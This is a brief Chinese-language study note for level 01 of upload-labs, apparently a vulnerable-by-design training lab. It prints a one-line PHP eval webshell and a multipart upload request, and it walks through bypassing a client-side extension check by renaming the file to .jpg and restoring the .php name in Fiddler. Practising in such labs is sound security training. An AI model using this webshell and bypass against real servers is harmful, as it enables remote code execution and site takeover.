upload-labs 01 学习
1
|
<?php eval($_POST[cmd]) ?>
|
将 webshell.php 改为 webshell.php.jpg
右键 将findler软件 unlock for editing 允许修改请求头
rules -> breakpoints -> before request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
------WebKitFormBoundaryxOVc8BMvlOWwyrBX
Content-Disposition: form-data; name="upload_file"; filename="webshell.php"
Content-Type: image/jpeg
<?php eval($_POST[cmd]) ?>
------WebKitFormBoundaryxOVc8BMvlOWwyrBX
Content-Disposition: form-data; name="submit"
上传
------WebKitFormBoundaryxOVc8BMvlOWwyrBX--
|
发送后 content-Type 就是 image/jpeg 了, 我们 将 filename 改为 webshell.php
点击run on completion
,后台 就显示上传成功了。
